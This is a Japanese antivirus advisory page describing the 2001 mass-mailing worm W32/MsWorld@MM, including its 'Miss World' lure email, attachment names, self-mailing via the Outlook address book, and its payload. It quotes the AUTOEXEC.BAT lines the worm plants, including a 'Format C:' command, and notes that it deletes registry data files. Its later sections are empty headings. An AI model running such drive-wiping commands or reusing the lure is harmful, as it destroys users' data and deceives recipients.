ウイルス情報

ウイルス名 危険度

W32/MsWorld@MM

企業ユーザ:
個人ユーザ:
種別 インターネットワーム
最小定義ファイル
(最初に検出を確認したバージョン)
4142
対応定義ファイル
(現在必要とされるバージョン)
4317 (現在7656)
対応エンジン 4.0.70以降 (現在5600) 
エンジンバージョンの見分け方
別名 W32.MsWorld@mm (NAV)
情報掲載日 01/06/14
発見日(米国日付) 01/06/05
駆除補足 ウイルス駆除のヒント
概要 ウイルスの特徴 感染症状 感染方法 駆除方法

概要

TOPへ戻る

ウイルスの特徴

  • W32/MsWorld@MMは、Macromedia Flashムービーに見せかけたマス メーリング ウイルスです。

  • このウイルスは、次のような内容の電子メール メッセージで配信されます。

    件名: Miss World

    本文:

    Hi, [受信者の名前が入る]

    Enjoy the latest pictures of Miss World from various Country

    (最近撮影された世界各国のミスワールドの写真をお楽しみください)

    添付ファイル: MWrld.exe、MissWorld.exe、またはMWld.exe (配信される添付ファイルは変わります)

  • 添付ファイルが実行されると、"Flash"ウィンドウが現れ、"I fall more in love with you each day!"と表示されます。

  • このウイルスは、Microsoft Outlookのアドレス帳に登録されているすべての宛先に自身を配信します。

  • また、システムのリブート時にすべてのドライブをフォーマットするための命令をAUTOEXEC.BATファイルに加えます。

    Echo Off

    Echo "This Everything for my Girl Friend.........,

    (CatEyes, KRSSL, SS Hostel) "

    Format C: /q /autotest

    Echo On

  • このウイルスは、終了時にUSER.DAT、USER.DA0、SYSTEM.DAT、およびSYSTEM.DA0ファイルを削除しようとします。

  • 上記の.DATファイルが使用中の場合は、ランタイムエラーが発生し、.DA0ファイルだけが削除されます。

TOPへ戻る

以下の症状が見られる場合、このウイルスに感染している可能性があります。

TOPへ戻る

感染方法

TOPへ戻る

駆除方法

TOPへ戻る